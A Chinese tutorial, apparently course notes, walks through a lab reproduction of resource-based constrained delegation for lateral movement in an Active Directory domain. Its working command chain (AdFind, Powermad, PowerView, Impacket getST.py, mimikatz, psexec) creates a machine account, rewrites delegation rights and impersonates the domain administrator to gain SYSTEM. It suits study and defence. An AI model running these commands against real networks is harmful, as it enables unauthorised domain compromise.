第136天:内网安全-横向移动资源约束委派

利用条件

首先是dc域控主机必须是win2012以上的主机

其次是域内有一个账户,可以同时登录两台主机

利用  jie 可以登录  win2008  也可以登录  win7

资源委派不需要设置委派,默认即可

实验复现

复现环境

通过网盘分享的文件:136-xiaodi.local内网域环境镜像文件
链接: https://pan.baidu.com/s/1H3ypkEoTiJMbwfMxJ7JMCA?pwd=wnra 提取码: wnra

这里在本地复现,cs中操作时一致的

使用adfind工具查询域内是否有SID一致的主机,并获取主机名

AdFind.exe -h DC的ip -b "DC=域,DC=控" -f "objectClass=computer" mS-DS-CreatorSID
AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

 要利用资源委派就得知道这个用户是谁,根据这个sid,利用工具sid2user.exe去查询用户名,需要删除sid的s-1以及后面的所有横杠

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

 

那么如果你拿到的就是dbadmin用户,就可以利用该账户从web渗透到dc,没拿到就得想办法去获取这个用户

利用这个工具去执行下面的攻击

https://gitcode.com/gh_mirrors/po/Powermad/overview?utm_source=csdn_github_accelerator&isLogin=1

添加机器

Set-ExecutionPolicy Bypass -Scope Process   ##设置允许执行脚本
import-module .\Powermad.ps1             ##导入模块
New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456

执行完成以后域控内有一个test1主机

获取新主机的sid值

Set-ExecutionPolicy Bypass -Scope Process 
Import-Module .\PowerView.ps1
Get-NetComputer test1 -Properties objectsid

 修改目标主机的属性

Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)"   ##(刚才获得的sid值)
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose  ##(DATA是攻击的目标主机)

检验是否配置成功

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

 

这个时候就可以生成票据去执行后续操作了,由于需要用到python程序,所以这里我还是用cs上线生成sockets代理

利用impack套件里面的getst.py获得票据,这里生成票据的时候不管你是再本地还是在代理都要记得设置hosts文件,否则无效

proxychains4 python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

生成了一个票据,上传到服务器,利用mimikatz导入票据

mimikatz kerberos::ptc administrator.ccache

再访问

提升权限

python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/410169.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

XSKY 亮相中国移动智算存储论坛,共话 AI 存储创新之路

XSKY 亮相中国移动智算存储论坛,共话 AI 存储创新之路

8 月 15 日,由中国移动云能力中心主办的“智算存储论坛”在南京大学顺利举办,本期技术论坛的主题是《智存未来-构建 AI 时代新型存储基础设施》。作为中国移动云能力中心的合作伙伴,XSKY星辰天合受邀参加了此次技术大会。 XSKY 产品总监朱荣…
阅读更多...
产品经理如何提升系统思考能力

产品经理如何提升系统思考能力

很多工作年限比较短的产品经理,分析问题的时候最初看到的都是单点,只有积累了足够的经验和阅历后,才能看到单点之外的“全局”,才会慢慢形成自己的系统思考能力,才会提高自己的认知能力。 产品经理如果想往更高层面发…
阅读更多...
解决添加MPJ插件启动报错

解决添加MPJ插件启动报错

在项目中需要用到多数据源的级联查询,所以引入了MPJ插件,MPJ的版本是1.2.4,MP的版本是3.5.3,但却在启动的时候报错,报错如下: 解决办法: 将MP的版本降到3.5.1
阅读更多...
重磅!尤文图斯携手Fortinet打造足球界的网络安全堡垒

重磅!尤文图斯携手Fortinet打造足球界的网络安全堡垒

近日,尤文图斯足球俱乐部与推动网络与安全融合的全球网络安全领导者 Fortinet(NASDAQ:FTNT)正式宣布建立合作伙伴关系,并签署了一项为期至2026年的赞助协议。在此框架下,Fortinet荣膺尤文图斯未来两个赛季的…
阅读更多...
Prompt-to-prompt image editing with cross attention control

Prompt-to-prompt image editing with cross attention control

Prompt-to-Prompt:基于 cross-attention 控制的图像编辑技术_prompt-to-prompt image editing with cross-attentio-CSDN博客文章浏览阅读2.7k次,点赞18次,收藏29次。Prompt-to-Prompt:基于 cross-attention 控制的图像编辑技术Prompt-to-prompt image editing with cross …
阅读更多...
大白话讲微服务的灾难性雪崩效应

大白话讲微服务的灾难性雪崩效应

讲在前面,为什么微服务需要有熔断等策略呢?今天我们用大白话来讲讲微服务的灾难性雪崩效应,熔断策略就是解决雪崩效应的有效解决方案。 什么是灾难性雪崩效应? 假设我们有两个访问量比较大的服务A和B,这两个服务分别依…
阅读更多...
19032 树上上升序列

19032 树上上升序列

### 思路 1. **输入处理**:读取节点个数、点权和边。 2. **构建图**:将树转换为有向无环图(DAG),边的方向从点权小的指向点权大的。 3. **拓扑排序**:对DAG进行拓扑排序。 4. **动态规划**:使用…
阅读更多...
创建一个Vue2项目

创建一个Vue2项目

我们都知道,可以使用 pnpm create vuelatest 来创建一个最新版本的vue项目,该版本为Vue3,但是这个过程没有给我们选择创建的vue版本 经典创建Vue2项目流程 1.下载Vue脚手架 pnpm i vue/cli 2.执行vue指令创建Vue项目 这里因为我们不想选择全局位置安装全局依赖&…
阅读更多...
小程序打开空白的问题处理

小程序打开空白的问题处理

小程序打开是空白的,如下: 这个问题都是请求域名的问题: 一、检查服务器域名配置了 https没有,如果没有,解决办法是申请个ssl证书, 具体看这里 https://doc.crmeb.com/mer/mer2/4257 二、完成第一步后&a…
阅读更多...
R 2火灾温度预测

R 2火灾温度预测

火灾温度预测 🍨 本文为🔗365天深度学习训练营 中的学习记录博客🍖 原作者:K同学啊 使用LSTM进行时间序列预测 这周学习如何使用长短期记忆网络(LSTM)进行时间序列预测。使用PyTorch框架来构建和训练模型&…
阅读更多...
捷途山海T2:混动技术,省钱驾驶新体验

捷途山海T2:混动技术,省钱驾驶新体验

在今日的汽车市场中,消费者的选择已经远远超出了传统的燃油车的范畴。随着节能、环保及用车成本等问题的逐渐凸显,人们开始寻找更加高效且环保的出行方式。在这一背景下,捷途山海T2作为一款搭载了高效混动系统的汽车,以其出色的节…
阅读更多...
《机器学习》 贝叶斯分类器 原理、参数讲解及代码演示

《机器学习》 贝叶斯分类器 原理、参数讲解及代码演示

目录 一、贝叶斯算法 1、简介 2、贝叶斯算法具有以下特点: 二、贝叶斯原理 1、正向概率(先验概率) 例如: 2、逆向概率(后验概率) 3、公式 1)实例1 2)实例2 • 目标&#x…
阅读更多...
轻松获得ADSL代理服务

轻松获得ADSL代理服务

ADSL 代理服务接入常见问答 在当今激烈的网络爬虫与反爬虫斗争中,各大网站和应用程序采取的风险管理手段愈加严格,其中最常见的一种措施是 IP 封禁。 为了有效应对 IP 封禁带来的挑战,设置代理服务成为一种非常有效的解决方案。配置完代理后…
阅读更多...
【计算机网络】电路交换、报文交换、分组交换

【计算机网络】电路交换、报文交换、分组交换

电路交换(Circuit Switching):通过物理线路的连接,动态地分配传输线路资源 ​​​​
阅读更多...
【2024】10个好用的AI搜索引擎大盘点

【2024】10个好用的AI搜索引擎大盘点

在2024年,随着人工智能技术的飞速发展,AI搜索引擎已经成为我们日常生活中不可或缺的一部分。这些基于人工智能技术的搜索引擎不仅提供了更快速、更准确的搜索体验,还通过自然语言处理(NLP)和机器学习(ML&am…
阅读更多...
快速学习“堆“排序(C语言数据结构)

快速学习“堆“排序(C语言数据结构)

前言: 堆的实现其实并不难,难的是要用堆实现排序,也就是堆的运用。 下面需要探究一下堆的排序是怎样的。 如何利用堆进行升序或者降序的排序。 "堆排序": 原理: 例如:此时要将数组里的数组int a…
阅读更多...
Leetcode面试经典150题-5.最长回文子串

Leetcode面试经典150题-5.最长回文子串

解法都在代码里,不懂就留言或者私信 class Solution {public static String longestPalindrome(String s) {if(s null || s.length() 0) {return null;}//加工字符串,例如abcdcba加工成#a#b#c#d#a#b#c#d#String str getManacherString(s);char[] str…
阅读更多...
【生日视频制作】滑行飞机机身改字,轻松修改文字AE模板修改文字软件生成器教程特效素材【AE模板】

【生日视频制作】滑行飞机机身改字,轻松修改文字AE模板修改文字软件生成器教程特效素材【AE模板】

飞机机身生日视频制作教程AE模板改文字特效广告生成器素材玩法 怎么如何做的【生日视频制作】滑行飞机机身改字,轻松修改文字AE模板修改文字软件生成器教程特效素材玩法【AE模板】 生日视频制作步骤: 安装AE软件下载AE模板把AE模板导入AE软件修改图片或…
阅读更多...
基于Java+SpringBoot+Vue的知识管理系统

基于Java+SpringBoot+Vue的知识管理系统

基于JavaSpringBootVue的知识管理系统 前言 ✌全网粉丝20W,csdn特邀作者、博客专家、CSDN[新星计划]导师、java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取项目下载方式🍅 哈喽…
阅读更多...
利用“2+1链动模式小程序AI智能名片S2B2C商城源码”优化企业参与外部社群策略

利用“2+1链动模式小程序AI智能名片S2B2C商城源码”优化企业参与外部社群策略

摘要:在当今数字化时代,企业参与外部社群已成为其市场扩张、品牌塑造及用户增长不可或缺的一环。然而,面对浩如烟海的社群类型,包括行业论坛、地区性论坛、特定兴趣爱好的论坛以及短视频网站等,如何精准选择并有效介入…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发